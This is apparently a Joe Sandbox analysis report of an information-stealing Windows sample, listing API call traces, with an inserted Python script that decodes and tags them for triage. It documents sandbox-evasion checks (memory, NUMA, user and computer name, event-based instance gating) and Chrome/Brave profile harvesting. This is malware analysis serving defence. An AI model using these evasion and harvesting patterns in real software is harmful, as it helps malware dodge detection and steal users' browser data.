                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: 5e0eba31b208d9ca9ca69f5ca1b4b8635b9982c67c18271d081340b0a416118e
                                  • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                  • Opcode Fuzzy Hash: 5e0eba31b208d9ca9ca69f5ca1b4b8635b9982c67c18271d081340b0a416118e
                                  • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                  Control-flow Graph

                                  Control-flow graph (node and edge list omitted): function at 00401220, basic blocks 00401220–0040129D; GlobalMemoryStatusEx in the entry block, two __aulldiv calls on one branch, and ExitProcess reached on one side of the following comparison.
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                  • __aulldiv.LIBCMT ref: 00401258
                                  • __aulldiv.LIBCMT ref: 00401266
                                  • ExitProcess.KERNEL32 ref: 00401294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                  • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                  • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                  Control-flow Graph

                                  Control-flow graph (node and edge list omitted): function at 00416ABA, basic blocks 00416ABA–00416B22. The dispatch block at 00416B0A either enters the OpenEventA block or falls through to CloseHandle and ExitProcess; after OpenEventA one successor closes a handle and calls Sleep before looping back to the dispatch block, the other calls CreateEventA and then proceeds to CloseHandle and ExitProcess.
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00883680,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                  • CloseHandle.KERNEL32(?,00000000,?,00883680,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                  • ExitProcess.KERNEL32 ref: 00416B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                  • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                  • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                  • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0088C4D8), ref: 00406303
                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0088BFB8,00000000,00000000,00400100,00000000), ref: 00406385
                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: 59c2f712046978f996f1235e97a4a9c2f26ee25370e317b3bcc87c900f09e2b2
                                  • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                  • Opcode Fuzzy Hash: 59c2f712046978f996f1235e97a4a9c2f26ee25370e317b3bcc87c900f09e2b2
                                  • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocComputerNameProcess
                                  • String ID:
                                  • API String ID: 4203777966-0
                                  • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                  • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                  • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                  • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                  • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                  • ExitProcess.KERNEL32 ref: 00401143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                  • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                  • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                  • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0085AB4E
                                  • Module32First.KERNEL32(00000000,00000224), ref: 0085AB6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0085A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_85a000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 3833638111-0
                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                  • Instruction ID: fd8e93069650f555440fe197809b2a257a3bcf166fd63a617fca3d8088e53715
                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                  • Instruction Fuzzy Hash: A1F062355007146FD7243AB9A8CDB6AB6EDFF49736F100628EA42D20C0DB70E94946A3
                                  APIs
                                  • SetErrorMode.KERNEL32(00000400,?,?,022E0223,?,?), ref: 022E0E19
                                  • SetErrorMode.KERNEL32(00000000,?,?,022E0223,?,?), ref: 022E0E1E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                  • Instruction ID: 53a1e4fbd78a44019b04391a038f3ae8355d6652015821f9a340369cd9bd9a6a
                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                  • Instruction Fuzzy Hash: 97D0123115512877DB003AD4DC09BCD7B1CDF09B66F448021FB0DE9080C7B0964146E5
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                  • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                  • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                  • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
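The API listings in this report are raw stack-slot dumps, so the analyst is left to decode the constants by hand: 00000004 versus 00000040 as the VirtualAlloc protection, 00001770 as the Sleep interval, 17C841C0 as the size that the function at 004010B3 allocates and immediately releases again. The script below is an added example for this page, not Joe Sandbox's or the sample's code. It parses lines in exactly the format shown above (the sample input is a constructed excerpt copied from the listings on this page), decodes the constants it knows (MEM_*, PAGE_*, EVENT_ALL_ACCESS, INTERNET_OPTION_SECURITY_FLAGS), and tags each function block with the patterns the report's signatures point at: a host query followed by ExitProcess, an allocation with PAGE_EXECUTE_READWRITE, and the OpenEventA/Sleep retry loop. Two things in it are inferences rather than report output: the decoder tables cover only the calls seen here and fall back to hex for anything else, and the slots listed for GetCurrentProcess (which takes no parameters) are read as the arguments already pushed for the VirtualAllocExNuma call that follows it, giving dwSize 0x7D0, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE and NUMA node 0.

```python
"""Decode the argument constants in Joe Sandbox "APIs" listings and flag the evasion
patterns they show. Added example for this page, not Joe Sandbox code. SAMPLE is a
constructed excerpt: API lines copied from the per-function listings above, one function
per blank-line-separated block. The tables cover only calls seen here; else hex."""
import re
from collections import namedtuple

SAMPLE = """\
• GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
• __aulldiv.LIBCMT ref: 00401258
• ExitProcess.KERNEL32 ref: 00401294

• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
• VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
• ExitProcess.KERNEL32 ref: 00401143

• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00883680), ref: 00416ACA
• Sleep.KERNEL32(00001770), ref: 00416B04
• ExitProcess.KERNEL32 ref: 00416B22

• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E), ref: 004010B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E), ref: 004010F7

• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0085A836
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
"""

LINE = re.compile(r"^\s*•\s*(?P<api>[^.\s]+)\.(?P<mod>\w+)"
                  r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
Call = namedtuple("Call", "api args ref")  # args: int per stack slot, None where the report shows '?'

def parse_block(text: str) -> list:
    """Parse one function's '• Api.MODULE(args), ref: ADDR' lines."""
    calls = []
    for m in filter(None, map(LINE.match, text.splitlines())):
        raw = m.group("args") or ""
        args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",") if a.strip()]
        calls.append(Call(m.group("api"), args, int(m.group("ref"), 16)))
    return calls

MEM = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
        0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

def mem_flags(v: int) -> str:
    return "|".join(n for b, n in MEM.items() if v & b) or hex(v)
def size(v: int) -> str:
    return f"{v:,} bytes" + (f" ({v / 2**20:.1f} MiB)" if v >= 2**20 else "")
def named(table: dict):
    return lambda v: table.get(v, hex(v))

# (api, zero-based stack slot) -> decoder for the value in that slot
DECODERS = {
    ("VirtualAlloc", 1): size, ("VirtualAlloc", 2): mem_flags, ("VirtualAlloc", 3): named(PAGE),
    ("VirtualFree", 1): size, ("VirtualFree", 2): mem_flags, ("Sleep", 0): lambda v: f"{v} ms",
    ("OpenEventA", 0): named({0x1F0003: "EVENT_ALL_ACCESS"}),
    ("InternetSetOptionA", 1): named({0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}),
}

def decode(call) -> list:
    return [DECODERS[(call.api, i)](v) for i, v in enumerate(call.args)
            if v is not None and (call.api, i) in DECODERS]

def numa_probe(calls):
    """GetCurrentProcess has no parameters: the slots listed for it are the arguments already
    pushed for the following VirtualAllocExNuma (lpAddress, dwSize, flAllocationType, flProtect, node)."""
    for prev, cur in zip(calls, calls[1:]):
        if (prev.api, cur.api) == ("GetCurrentProcess", "VirtualAllocExNuma") \
                and len(prev.args) >= 5 and None not in prev.args[:5]:
            _, sz, typ, prot, node = prev.args[:5]
            return f"VirtualAllocExNuma: {size(sz)}, {mem_flags(typ)}, {named(PAGE)(prot)}, node {node}"
    return None

# Host queries whose result decides whether execution continues (cf. the report's "evasive API chain").
ENV_QUERIES = {"GlobalMemoryStatusEx", "GetSystemInfo", "VirtualAllocExNuma",
               "GetUserDefaultLangID", "GetUserDefaultLCID", "GetComputerNameA", "GetUserNameA"}

def classify(calls) -> list:
    apis = {c.api for c in calls}
    tags = []
    if "ExitProcess" in apis and ENV_QUERIES & apis:
        tags.append("environment check ending in ExitProcess")
    if any(c.api == "VirtualAlloc" and len(c.args) > 3 and c.args[3] == 0x40 for c in calls):
        tags.append("RWX allocation")
    if {"OpenEventA", "Sleep"} <= apis:
        tags.append("named-event instance gate with Sleep retry")
    return tags

def analyze(text: str) -> list:
    """One summary per blank-line-separated function block."""
    out = []
    for block in filter(str.strip, text.split("\n\n")):
        calls = parse_block(block)
        decoded = {f"{c.api}@{c.ref:08X}": decode(c) for c in calls if decode(c)}
        if probe := numa_probe(calls):
            decoded["VirtualAllocExNuma"] = [probe]
        out.append({"apis": [c.api for c in calls], "decoded": decoded, "tags": classify(calls)})
    return out

if __name__ == "__main__":
    for s in analyze(SAMPLE):
        print(" -> ".join(s["apis"]), s["tags"], s["decoded"])
```

Run as-is it prints one line per function block; paste the APIs section of another function page from this report into SAMPLE to triage it the same way. Two readings fall out directly: 17C841C0 is 399,000,000 bytes (about 380 MiB) committed with PAGE_READWRITE and released again in the same function, called from 0040114E inside the function that also performs the VirtualAllocExNuma probe, so it belongs to the same pre-flight sequence; and 00001770 is a 6000 ms Sleep between OpenEventA retries.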
                                  APIs
                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                  • ExitProcess.KERNEL32 ref: 004011C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 1004333139-0
                                  • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                  • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                  • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                  • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0085A836
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0085A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_85a000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                  • Instruction ID: abc93e4e1119d97e1634e867d0487b1bf0263ecb07c40242be787e8997ec9788
                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                  • Instruction Fuzzy Hash: 00112B79A00208EFDB01DF98C985E98BBF5EF08351F0580A4F9489B362D371EA94DB91
                                  APIs
                                  • wsprintfA.USER32 ref: 004138CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-817767981
                                  • Opcode ID: 147e69476bc17354b056f5ce00ba28a25639a4ba897131371b79271fd6134482
                                  • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                  • Opcode Fuzzy Hash: 147e69476bc17354b056f5ce00ba28a25639a4ba897131371b79271fd6134482
                                  • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: ad623e4dddf2acf3531251e10fe9148c0028cfef02df62942197d5aa38f2a08f
                                  • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                  • Opcode Fuzzy Hash: ad623e4dddf2acf3531251e10fe9148c0028cfef02df62942197d5aa38f2a08f
                                  • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                  APIs
                                  • wsprintfA.USER32 ref: 0041492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00414B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: f64dd78f470d60d5e6684bba1db7ab347a0029ed743c8e05a62c1da31839ea41
                                  • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
